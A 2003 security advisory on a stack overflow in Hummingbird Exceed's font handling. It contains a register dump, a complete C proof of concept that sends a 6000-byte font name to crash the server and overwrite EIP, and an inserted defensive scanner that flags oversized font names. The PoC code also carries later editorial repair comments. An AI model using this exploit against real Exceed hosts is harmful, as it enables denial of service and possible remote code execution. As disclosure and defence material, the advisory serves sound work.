$ An open security advisory #2 - Hummingbird Exceed (All Versions) POC Code

1: Bug Researcher: c0ntex@hushmail.com
2: Bug Released: August 2003
3: Bug Impact Rate: Medium / Hi
4: Bug Scope Rate: Remote / Local

HQOTD: "How secure do you want it"

I'll tell you: Much more please sirs.


Exceed has some bugs caused by the way it handles fonts in a local and remote context.

By requesting the use of a font from an Exceed database, providing the font name is
either longer than the defined buffer or the font has been prepared as hostile code,
a stack-based overflow will occur. This will allow the execution of external commands
on the vulnerable system.

Obviously it's possible to cause a denial of service (DoS) attack on a machine running
Exceed too.

By sending an X Term window or any other X application to Exceed, loading a large font
name or creating a large window title, we can corrupt the stack and cause Exceed to


Windows Stack Trace:

EAX = C0000000
EBX = 00000000
ECX = 40000000
EDX = 00000501
ESI = 41414141
EDI = 0012E138
EIP = 41414141
ESP = 0012E0C8
EBP = 0012E0F0

(ESI and EIP hold 41414141, i.e. the 'A' bytes of the oversized font name, so the
return address is fully under the control of whoever supplies the name.)

[-] We can crash a local Exceed server * 2
[-] We can crash a remote Exceed server * many
[-] We can crash Exceed client * many
[-] We can write over EIP address * many

See the POC code below for more information.

Example Run:

[c0ntex@darkside exceed]$ gcc -o exceed exceed.c -lX11 -L /usr/X11R6/lib
[c0ntex@darkside exceed]$ ./exceed exploited:0.0

[-] Exceed [ALL] EIP Attack - c0ntex@hushmail.com
[-] We are using DISPLAY variable: exploited:0.0
[-] Hang on to your feathers, sending some buffer

XIO: fatal IO error 104 (Connection reset by peer) on X server "exploited:0.0"
after 11 requests (9 known processed) with 0 events remaining.

Remote Font Server:

If you find that you use remote font servers with Exceed, a way to check that the server
is not trying to exploit your PC could be:

$ xlsfonts -display exceed_server:0.0
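The xlsfonts check above only prints what the server offers; a person still has to spot the bad entry. Added here as an example that is not part of c0ntex's advisory: a small scanner that reads an xlsfonts-style listing (one font name per line) and flags any name that exceeds an assumed length limit (FONT_NAME_LIMIT, 256 bytes, my choice) or contains non-printable bytes, the two properties an oversized or hostile font name would show. The sample listing is constructed, and the program name fontscan is a placeholder.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Assumed upper bound for a legitimate font name. XLFD names in practice
 * stay well under this; the advisory's PoC sends 6000 bytes. */
#define FONT_NAME_LIMIT 256

enum font_verdict { FONT_OK = 0, FONT_TOO_LONG = 1, FONT_BAD_BYTES = 2 };

/* Judge a single font name of the given length (need not be NUL-terminated). */
enum font_verdict check_font_name(const char *name, size_t len, size_t limit)
{
    if (len > limit)
        return FONT_TOO_LONG;
    for (size_t i = 0; i < len; i++)
        if (!isprint((unsigned char)name[i]))   /* control or raw high bytes */
            return FONT_BAD_BYTES;
    return FONT_OK;
}

/* Walk a newline-separated listing (one name per line, as xlsfonts prints
 * it), report each suspicious entry on stderr and return how many there
 * were. Names are examined in place, so an oversized entry is never copied
 * into a fixed-size buffer of our own. */
int scan_font_listing(const char *listing, size_t limit)
{
    int suspicious = 0, lineno = 0;
    const char *p = listing;

    while (*p) {
        const char *nl = strchr(p, '\n');
        size_t len = nl ? (size_t)(nl - p) : strlen(p);
        lineno++;
        if (len > 0) {
            enum font_verdict v = check_font_name(p, len, limit);
            if (v != FONT_OK) {
                suspicious++;
                fprintf(stderr, "line %d: %s (%zu bytes)\n", lineno,
                        v == FONT_TOO_LONG ? "font name exceeds length limit"
                                           : "non-printable bytes in font name",
                        len);
            }
        }
        if (!nl)
            break;
        p = nl + 1;
    }
    return suspicious;
}

/* Constructed sample: two ordinary XLFD names, one 6000-byte name like the
 * PoC's, and one carrying control bytes. Returns the number of bytes written. */
size_t build_sample_listing(char *buf, size_t cap)
{
    size_t n = 0;
    n += snprintf(buf + n, cap - n, "-misc-fixed-medium-r-normal--13-120-75-75-c-70-iso8859-1\n");
    n += snprintf(buf + n, cap - n, "-adobe-helvetica-bold-r-normal--12-120-75-75-p-70-iso8859-1\n");
    for (size_t i = 0; i < 6000 && n + 2 < cap; i++)
        buf[n++] = 'A';
    buf[n++] = '\n';
    n += snprintf(buf + n, cap - n, "-misc-fixed\x01\x02-bad\n");
    return n;
}

/* Scan the constructed sample; its two bad entries give a result of 2. */
int run_sample_scan(void)
{
    static char listing[8192];
    build_sample_listing(listing, sizeof listing);
    return scan_font_listing(listing, FONT_NAME_LIMIT);
}

/* Usage: xlsfonts -display exceed_server:0.0 | ./fontscan
 *        ./fontscan --sample        (runs against the built-in sample) */
int main(int argc, char *argv[])
{
    static char listing[1 << 20];        /* up to 1 MiB of listing from stdin */
    size_t n;
    if (argc > 1 && strcmp(argv[1], "--sample") == 0)
        n = build_sample_listing(listing, sizeof listing);
    else
        n = fread(listing, 1, sizeof listing - 1, stdin);
    listing[n] = '\0';
    int bad = scan_font_listing(listing, FONT_NAME_LIMIT);
    printf("%d suspicious font name(s)\n", bad);
    return bad ? 1 : 0;
}
```

The scanner exits non-zero when anything is flagged, so it can sit in a script that runs before a font server is trusted. The length limit is a judgement call: lower it to match the longest name your own font servers legitimately serve.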

$ Hummingbird informed 3 weeks ago, still no reply.

$ Work around: Uninstall Exceed until a patch has been released.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <X11/Xlib.h>

/* Name of the environment variable the PoC sets from argv[1]. The original
 * #define did not survive extraction; "DISPLAY" is restored from the usage
 * and status messages below. */
#define HABITAT "DISPLAY"

#define BIGBIRD 6001
#define DIRTY_VAL 69
#define MAX_BORDER_LEN 3
#define WIN_TIMER 5
#define WIN_TITLE "simple PoC window - lets shoot birds"

typedef char Birds;

int main(int argc, char *argv[])
{
    Birds nests[BIGBIRD];                 /* the oversized font name */
    Birds egg[2] = { 'A', '\0' };
    Birds *feathersN = NULL;              /* NULL: XOpenDisplay reads $DISPLAY */

    unsigned short eggs, chicks;
    unsigned short winW, winH, feathersW, feathersH;
    unsigned long locX = 0, locY = 0;
    unsigned long winBDR = MAX_BORDER_LEN;
    Display* feathers;
    Window wingspan;
    XFontStruct* birdcull;

    fprintf(stderr, "\n\n[-] Exceed [ALL] EIP Attack - c0ntex@hushmail.com\n");

    if(argc < 2) {
        fprintf(stderr, "[-] Please set IP/Hostname for DISPLAY pointer!\n");
        fprintf(stderr, "[-] Usage: %s \n\n", argv[0]);
        return EXIT_FAILURE;
    }

    if(setenv(HABITAT, argv[1], 1) < 0) { /*;p*/
        perror("setenv"); return EXIT_FAILURE;
    }

    fprintf(stderr, "[-] Ok, using DISPLAY variable: %s\n", argv[1]);

    /* Build BIGBIRD-1 bytes of 'A'. strncat needs a terminated destination
     * and never returns NULL, so the original NULL check is gone; the
     * original also passed sizeof(BIGBIRD)-1, i.e. sizeof(int)-1, where the
     * length of egg was meant. */
    nests[0] = '\0';
    for(eggs = 0; eggs < BIGBIRD - 1; eggs++)
        strncat(nests, egg, sizeof(egg) - 1);

    if((feathers = XOpenDisplay(feathersN)) == NULL) {
        perror("XOpenDisplay"); return EXIT_FAILURE;
    }

    chicks = DefaultScreen(feathers);
    winW = ((feathersW = DisplayWidth(feathers, chicks)) / 3);
    winH = ((feathersH = DisplayHeight(feathers, chicks)) / 3);

    wingspan = XCreateSimpleWindow(feathers, RootWindow(feathers, chicks),
                                   locX, locY, winW, winH, winBDR,
                                   BlackPixel(feathers, chicks),
                                   WhitePixel(feathers, chicks));
    /* The original compared the function pointer XCreateSimpleWindow with
     * NULL (always false); check the returned window id instead. */
    if(wingspan == None) {
        perror("XCreateSimpleWindow"); return EXIT_FAILURE;
    }

    /* XStoreName and XMapWindow report failures through the X error handler,
     * not through return values, so the original NULL tests on the function
     * names are dropped. */
    XStoreName(feathers, wingspan, WIN_TITLE);
    XMapWindow(feathers, wingspan);

    fprintf(stderr, "[-] Hang on to your feathers, sending some buffer \n\n");

    /* Ask the server to open a font whose name is BIGBIRD-1 bytes long. */
    if((birdcull = XLoadQueryFont(feathers, nests)) == NULL) {
        perror("XLoadQueryFont"); return EXIT_FAILURE;
    }

    /* The advisory's listing stops after the font request; release the
     * resources so the program is complete. */
    XFreeFont(feathers, birdcull);
    XCloseDisplay(feathers);
    return EXIT_SUCCESS;
}


